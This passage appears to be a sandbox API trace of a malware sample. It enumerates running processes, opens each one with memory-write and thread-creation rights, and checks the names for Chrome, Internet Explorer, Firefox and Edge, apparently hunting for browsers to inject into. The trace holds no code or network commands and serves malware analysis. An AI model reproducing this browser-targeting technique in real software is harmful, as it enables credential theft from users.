	[0255.691] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.691] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.691] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.691] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.692] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.692] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x290) returned 0xb040
	[0255.692] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.692] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.693] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.693] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.693] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.693] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.694] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.694] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x2c4) returned 0xb044
	[0255.694] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.694] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.695] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.695] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.695] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.695] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.696] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x324, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.696] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x324) returned 0xb048
	[0255.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.697] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.697] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.697] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.697] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.698] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.698] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x34c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.698] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x34c) returned 0xb04c
	[0255.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.699] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.699] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.699] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.699] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.700] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.700] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x3e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.702] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x3e4) returned 0xb050
	[0255.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.702] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.702] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.703] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.703] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.703] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.703] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.703] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x42c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.704] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x42c) returned 0xb054
	[0255.704] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.704] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.705] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.705] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.705] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.705] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.705] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0255.706] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4c8) returned 0xb058
	[0255.706] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.706] StrStrIA (lpFirst="spoolsv.exe", lpSrch="chrome.exe") returned 0x0
	[0255.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.707] StrStrIA (lpFirst="spoolsv.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.707] StrStrIA (lpFirst="spoolsv.exe", lpSrch="firefox.exe") returned 0x0
	[0255.707] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.707] StrStrIA (lpFirst="spoolsv.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.707] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x4f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.708] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x4f0) returned 0xb05c
	[0255.708] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.708] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.709] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.709] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.709] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.709] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.710] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x54c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0255.710] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x54c) returned 0xb060
	[0255.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.711] StrStrIA (lpFirst="taskhost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.711] StrStrIA (lpFirst="taskhost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.711] StrStrIA (lpFirst="taskhost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.711] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.712] StrStrIA (lpFirst="taskhost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.712] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x590, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x34c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1
	[0255.712] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x590) returned 0xb064
	[0255.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.713] StrStrIA (lpFirst="taskeng.exe", lpSrch="chrome.exe") returned 0x0
	[0255.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.713] StrStrIA (lpFirst="taskeng.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.713] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.713] StrStrIA (lpFirst="taskeng.exe", lpSrch="firefox.exe") returned 0x0
	[0255.714] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.714] StrStrIA (lpFirst="taskeng.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.714] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0255.714] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xf0) returned 0xb068
	[0255.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.715] StrStrIA (lpFirst="svchost.exe", lpSrch="chrome.exe") returned 0x0
	[0255.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.715] StrStrIA (lpFirst="svchost.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.715] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.715] StrStrIA (lpFirst="svchost.exe", lpSrch="firefox.exe") returned 0x0
	[0255.716] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.716] StrStrIA (lpFirst="svchost.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.717] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x270, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1
	[0255.717] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x270) returned 0xb06c
	[0255.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.718] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="chrome.exe") returned 0x0
	[0255.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.718] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.718] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.718] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="firefox.exe") returned 0x0
	[0255.719] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.719] StrStrIA (lpFirst="WmiPrvSE.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.719] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x500, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1d8, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1
	[0255.720] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x500) returned 0xb070
	[0255.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.720] StrStrIA (lpFirst="sppsvc.exe", lpSrch="chrome.exe") returned 0x0
	[0255.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.720] StrStrIA (lpFirst="sppsvc.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.720] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.720] StrStrIA (lpFirst="sppsvc.exe", lpSrch="firefox.exe") returned 0x0
	[0255.721] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.721] StrStrIA (lpFirst="sppsvc.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.721] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x7b8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x324, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0255.722] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x7b8) returned 0xb074
	[0255.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.722] StrStrIA (lpFirst="dwm.exe", lpSrch="chrome.exe") returned 0x0
	[0255.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.722] StrStrIA (lpFirst="dwm.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.722] StrStrIA (lpFirst="dwm.exe", lpSrch="firefox.exe") returned 0x0
	[0255.722] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.722] StrStrIA (lpFirst="dwm.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.723] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x61c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x394, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0255.723] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x61c) returned 0xb078
	[0255.723] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.723] StrStrIA (lpFirst="explorer.exe", lpSrch="chrome.exe") returned 0x0
	[0255.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.724] StrStrIA (lpFirst="explorer.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.724] StrStrIA (lpFirst="explorer.exe", lpSrch="firefox.exe") returned 0x0
	[0255.724] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.724] StrStrIA (lpFirst="explorer.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.725] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0x62c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0255.725] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0x62c) returned 0x0
	[0255.725] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa78, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="shirts_cumshots_compaq.exe")) returned 1
	[0255.726] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa78) returned 0xb07c
	[0255.726] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.726] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="chrome.exe") returned 0x0
	[0255.727] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.727] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.728] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="firefox.exe") returned 0x0
	[0255.728] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.728] StrStrIA (lpFirst="shirts_cumshots_compaq.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.729] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xa9c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="league.exe")) returned 1
	[0255.729] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xa9c) returned 0xb080
	[0255.729] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.729] StrStrIA (lpFirst="league.exe", lpSrch="chrome.exe") returned 0x0
	[0255.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.730] StrStrIA (lpFirst="league.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.730] StrStrIA (lpFirst="league.exe", lpSrch="firefox.exe") returned 0x0
	[0255.730] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.730] StrStrIA (lpFirst="league.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.730] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="js_sound.exe")) returned 1
	[0255.731] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaac) returned 0xb084
	[0255.731] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.731] StrStrIA (lpFirst="js_sound.exe", lpSrch="chrome.exe") returned 0x0
	[0255.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.732] StrStrIA (lpFirst="js_sound.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.732] StrStrIA (lpFirst="js_sound.exe", lpSrch="firefox.exe") returned 0x0
	[0255.732] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.732] StrStrIA (lpFirst="js_sound.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.733] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xac0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="beast-dry.exe")) returned 1
	[0255.733] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xac0) returned 0xb088
	[0255.733] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.734] StrStrIA (lpFirst="beast-dry.exe", lpSrch="chrome.exe") returned 0x0
	[0255.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.734] StrStrIA (lpFirst="beast-dry.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.734] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.734] StrStrIA (lpFirst="beast-dry.exe", lpSrch="firefox.exe") returned 0x0
	[0255.735] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.735] StrStrIA (lpFirst="beast-dry.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.735] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xad0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="forecastsgeographic.exe")) returned 1
	[0255.736] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xad0) returned 0xb08c
	[0255.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.736] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="chrome.exe") returned 0x0
	[0255.736] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.736] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.737] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="firefox.exe") returned 0x0
	[0255.737] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.737] StrStrIA (lpFirst="forecastsgeographic.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.738] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xae0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reno.exe")) returned 1
	[0255.739] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xae0) returned 0xb090
	[0255.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.739] StrStrIA (lpFirst="reno.exe", lpSrch="chrome.exe") returned 0x0
	[0255.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.739] StrStrIA (lpFirst="reno.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.739] StrStrIA (lpFirst="reno.exe", lpSrch="firefox.exe") returned 0x0
	[0255.739] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.739] StrStrIA (lpFirst="reno.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.740] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xaf0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="specreformwear.exe")) returned 1
	[0255.740] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xaf0) returned 0xb094
	[0255.740] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.740] StrStrIA (lpFirst="specreformwear.exe", lpSrch="chrome.exe") returned 0x0
	[0255.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.741] StrStrIA (lpFirst="specreformwear.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.741] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.741] StrStrIA (lpFirst="specreformwear.exe", lpSrch="firefox.exe") returned 0x0
	[0255.742] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.742] StrStrIA (lpFirst="specreformwear.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.742] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="rr_publications.exe")) returned 1
	[0255.743] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb00) returned 0xb098
	[0255.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.743] StrStrIA (lpFirst="rr_publications.exe", lpSrch="chrome.exe") returned 0x0
	[0255.743] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.743] StrStrIA (lpFirst="rr_publications.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.744] StrStrIA (lpFirst="rr_publications.exe", lpSrch="firefox.exe") returned 0x0
	[0255.744] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.744] StrStrIA (lpFirst="rr_publications.exe", lpSrch="microsoftedgecp.exe") returned 0x0
	[0255.745] Process32Next (in: hSnapshot=0x4fd0, lppe=0x101f824 | out: lppe=0x101f824*(dwSize=0x128, cntUsage=0x0, th32ProcessID=0xb10, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x61c, pcPriClassBase=8, dwFlags=0x0, szExeFile="solo.exe")) returned 1
	[0255.745] OpenProcess (dwDesiredAccess=0x43b, bInheritHandle=0, dwProcessId=0xb10) returned 0xb09c
	[0255.745] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.745] StrStrIA (lpFirst="solo.exe", lpSrch="chrome.exe") returned 0x0
	[0255.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.746] StrStrIA (lpFirst="solo.exe", lpSrch="iexplore.exe") returned 0x0
	[0255.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.746] StrStrIA (lpFirst="solo.exe", lpSrch="firefox.exe") returned 0x0
	[0255.746] GetModuleHandleA (lpModuleName="shell32.dll") returned 0x75bb0000
	[0255.746] StrStrIA (lpFirst="solo.exe", lpSrch="microsoftedgecp.exe") returned 0x0
